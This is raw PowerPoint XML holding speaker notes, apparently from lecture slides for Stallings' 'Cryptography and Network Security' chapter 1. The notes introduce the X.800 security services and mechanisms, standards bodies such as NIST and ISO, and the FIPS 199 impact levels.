          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Note both similarities and differences with traditional paper documents, which for example: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>have signatures &amp; dates; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> need protection from disclosure, tampering, or destruction; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> may be notarized or witnessed; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> may be recorded or licensed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT" i="1">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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999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7C1013A-BAF7-4076-921B-B3AA5EA975DF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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This list is taken from Stallings Table 1.2 which provides details of the 5 Security Service categories and the 14 specific services given in X.800.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This list includes the various "classic" security services which are traditionally discussed.  Note there is a degree of ambiguity as to the meaning of these terms, and overlap in their use. The broad service categories are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>authentication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is concerned with assuring that a communication is authentic. Two specific authentication services are defined in X.800: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Peer entity authentication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>provides corroboration of the identity of a peer entity in an association; and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data origin authentication: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>provides corroboration of the source of a data unit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>access control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the ability to limit and control the access to host systems and applications via communications links.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>confidentiality </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the protection of transmitted data from passive attacks, and the protection of traffic flow from analysis.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>integrity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>assures that messages are received as sent, with no duplication, insertion, modification, reordering, replay, or loss.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>availability </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>is the property of a system / resource being accessible and usable upon demand by an authorized system entity, according to performance specifications for the system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="it-IT">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544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p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1536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536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3885BB4-2648-4BEB-9FD3-AF5CE64C8EA0}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="441680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C4C8413-F714-4015-8233-FF74A8C5E3E1}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Now introduce “Security Mechanism” which are the specific means of implementing one or more security services. Note these mechanisms span a wide range of technical components, but one aspect seen in many is the use of cryptographic techniques.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3680513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37ACC724-122C-4B98-8D89-C88B63A23154}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Some examples of mechanisms from X.800. Note that the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>specific security mechanisms” are protocol layer specific, whilst the “pervasive security mechanisms” are not. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>We will meet some of these mechanisms in much greater detail later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>See Stallings Table 1.3 for details of these mechanisms in X.800, and Table 1.4 for the relationship between services and mechanisms.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2354409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gnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563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5632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9597495-FF50-45FC-8F0E-DEBE73C726EF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3559564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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5837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5837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7A0A5AC-4E2D-4FE6-880D-57A594C6200E}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3611542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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6041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6042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4A633C3-9946-462E-BB4F-6E7010E36CAB}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1789779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C27E2C0-BD37-4ECE-A780-60FCB0284027}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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Lecture slides by Lawrie Brown for “Cryptography and Network Security”, 5/e, by William Stallings, briefly reviewing the text outline from Ch 0, and then presenting the content from Chapter 1 – “Introduction”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" altLang="it-IT">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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2956932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material in this book is organized into four broad categories:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cryptographic algorithms: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is the study of techniques for ensuring the secrecy and/or authenticity of information. The three main areas of study in this category are: 1. symmetric encryption, 2. asymmetric encryption, and 3. cryptographic hash functions, with the related topics of message authentication codes and digital signatures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mutual trust: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This is the study of techniques and algorithms for providing mutual trust in two main areas. First, key management and distribution deals with establishing trust in the encryption keys used between two communicating entities. Second, user authentication deals with establish trust in the identity of a communicating partner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Network security: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This area covers the use of cryptographic algorithms in network protocols and network applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Computer security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: In this book, we use this term to refer to the security of computers against intruders (e.g., hackers) and malicious software (e.g., viruses). Typically, the computer to be secured is attached to a network and the bulk of the threats arise from the network.</a:t>
            </a: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D91CC6A-19F4-4357-B06E-E87F385A6D20}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3714443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sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Throughout this book, we describe the most important standards in use or being developed for various aspects of cryptography and</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>network security. Various organizations have been involved in the development or promotion of these standards including:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• NIST is a U.S. federal agency that deals with measurement science, standards, and technology related to U.S. government use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and to the promotion of U.S. private-sector innovation. Despite its national scope, NIST Federal Information Processing Standards (FIPS) and Special Publications (SP) have a worldwide impact.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ISOC is a professional membership society with worldwide organizational and individual membership. It provides leadership in addressing issues that confront the future of the Internet and is the organization home for the groups responsible for Internet infrastructure standards, including the Internet Engineering Task Force (IETF) and the Internet Architecture Board (IAB). These organizations develop Internet standards and related specifications, all of which are published as Requests for Comments (RFCs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ITU is an international organization within the United Nations System in which governments and the private sector coordinate global telecom networks and services The ITU Telecommunication Standardization Sector (ITU-T) is one of the three sectors of the ITU. ITU-T's mission is the production of standards covering all fields of telecommunications. ITU-T standards are referred to as Recommendations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• ISO is a worldwide federation of national standards bodies from more than 140 countries, one from each country. ISO is a nongovernmental organization that promotes the development of standardization and related activities with a view to facilitating the international exchange of goods and services, and to developing cooperation in the spheres of intellectual, scientific, technological, and economic activity. ISO's work results in international agreements that are published as International Standards.</a:t>
            </a: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BE8FC48-0D69-4E17-8C5B-1E368031102A}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2471513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208A561-51E4-4D1C-A39E-4F64E9BD57F4}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 1026"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6861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 1 reflects a fundamental principle that we must understand the strength of the algorithms we use in order to have a suitable level of security.</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850293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AA5EE0-A34A-401A-B6BB-DA86D89BD1DF}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>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The NIST Computer Security Handbook [NIST95] defines the term </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>computer security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>as shown on this slide. This definition introduces three key objectives that are at the heart of computer security as we see on the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19068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egnaposto immagine diapositiva 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1741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741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979E81E-B7BC-4761-9775-BDDD57B10E93}" type="slidenum">
              <a:rPr lang="en-AU" altLang="it-IT"/>
              <a:pPr>
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-AU" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="639680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We can define three levels of impact on organizations or individuals should there be a breach of security (i.e., a loss of confidentiality, integrity, or availability). These levels are defined in FIPS PUB 199:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>• </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Low: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The loss could be expected to have a limited adverse effect on organizational operations, organizational assets, or individuals. A limited adverse effect means that, for example, the loss of confidentiality, integrity, or availability might (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT" sz="1100" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
